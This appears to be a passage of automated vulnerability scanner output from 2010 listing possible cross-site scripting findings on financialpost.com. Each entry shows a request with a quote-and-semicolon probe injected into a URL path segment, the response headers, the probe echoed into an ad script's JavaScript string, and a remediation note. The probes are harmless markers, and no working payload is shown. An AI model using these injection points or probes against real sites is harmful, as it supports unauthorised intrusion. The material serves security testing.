GET /entrepreneur/Social+media+gives+medium+life/3931982/afc98'%3ba15a08852bc HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44342
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f775e'%3b6b7ab346bbb was submitted in the REST URL parameter 1. This input was echoed as f775e';6b7ab346bbb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneurf775e'%3b6b7ab346bbb/Strategy+comes+easy/3931965/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 81970
Expires: Sun, 19 Dec 2010 03:14:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneurf775e';6b7ab346bbb/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneurf775e';6b7ab346bbb;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=45520954?">
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6435'%3b4f2bbbc1920 was submitted in the REST URL parameter 3. This input was echoed as b6435';4f2bbbc1920 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Strategy+comes+easy/3931965b6435'%3b4f2bbbc1920/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 54006
Expires: Sun, 19 Dec 2010 03:14:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/strategy-comes-easy/3931965b6435';4f2bbbc1920/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=strategy-comes-easy;kw=3931965b6435';4f2bbbc1920;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=3973656
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 645f3'%3b095502b1fd7 was submitted in the REST URL parameter 4. This input was echoed as 645f3';095502b1fd7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Strategy+comes+easy/3931965/645f3'%3b095502b1fd7 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44013
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6640b'%3b10be691c8d7 was submitted in the REST URL parameter 1. This input was echoed as 6640b';10be691c8d7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur6640b'%3b10be691c8d7/Virtual+training/3967328/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83218
Expires: Sun, 19 Dec 2010 03:14:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur6640b';10be691c8d7/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur6640b';10be691c8d7;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=50079065?">
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb40f'%3b9d8ba420d75 was submitted in the REST URL parameter 3. This input was echoed as eb40f';9d8ba420d75 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Virtual+training/3967328eb40f'%3b9d8ba420d75/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 53895
Expires: Sun, 19 Dec 2010 03:14:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/virtual-training/3967328eb40f';9d8ba420d75/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=virtual-training;kw=3967328eb40f';9d8ba420d75;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=68303724?"
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7504a'%3b07f3b9742b1 was submitted in the REST URL parameter 4. This input was echoed as 7504a';07f3b9742b1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Virtual+training/3967328/7504a'%3b07f3b9742b1 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44723
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74d93'%3be0889b50b05 was submitted in the REST URL parameter 1. This input was echoed as 74d93';e0889b50b05 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur74d93'%3be0889b50b05/advice/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44241
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed228'%3b2c8aa648e62 was submitted in the REST URL parameter 2. This input was echoed as ed228';2c8aa648e62 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/adviceed228'%3b2c8aa648e62/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43385
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83f2b'%3b12bcecac1dd was submitted in the REST URL parameter 1. This input was echoed as 83f2b';12bcecac1dd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur83f2b'%3b12bcecac1dd/killer+apps/3967312/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75646
Expires: Sun, 19 Dec 2010 03:14:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur83f2b';12bcecac1dd/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur83f2b';12bcecac1dd;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=30614803?">
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9123'%3bb2fb6e2f239 was submitted in the REST URL parameter 3. This input was echoed as f9123';b2fb6e2f239 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/killer+apps/3967312f9123'%3bb2fb6e2f239/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 53710
Expires: Sun, 19 Dec 2010 03:14:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/killer-apps/3967312f9123';b2fb6e2f239/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=killer-apps;kw=3967312f9123';b2fb6e2f239;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=34256389?">
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1b1a'%3b6b59f0dfd4e was submitted in the REST URL parameter 4. This input was echoed as d1b1a';6b59f0dfd4e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/killer+apps/3967312/d1b1a'%3b6b59f0dfd4e HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43793
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 774a7'%3b09a396780ea was submitted in the REST URL parameter 1. This input was echoed as 774a7';09a396780ea in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive774a7'%3b09a396780ea/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43161
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d37d2'%3b1feea254f5a was submitted in the REST URL parameter 1. This input was echoed as d37d2';1feea254f5a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executived37d2'%3b1feea254f5a/Departures+2010/3987965/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 84441
Expires: Sun, 19 Dec 2010 03:11:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executived37d2';1feea254f5a/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executived37d2';1feea254f5a;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=69285676?">
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14022'%3bbd82e3b5b53 was submitted in the REST URL parameter 3. This input was echoed as 14022';bd82e3b5b53 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Departures+2010/398796514022'%3bbd82e3b5b53/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69246
Expires: Sun, 19 Dec 2010 03:12:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/departures-2010/398796514022';bd82e3b5b53/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=departures-2010;kw=398796514022';bd82e3b5b53;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=92756471?">
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55e80'%3b7249d7b80f9 was submitted in the REST URL parameter 4. This input was echoed as 55e80';7249d7b80f9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Departures+2010/3987965/55e80'%3b7249d7b80f9 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43809
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86b9c'%3bbb1481860ca was submitted in the REST URL parameter 1. This input was echoed as 86b9c';bb1481860ca in the application's response.
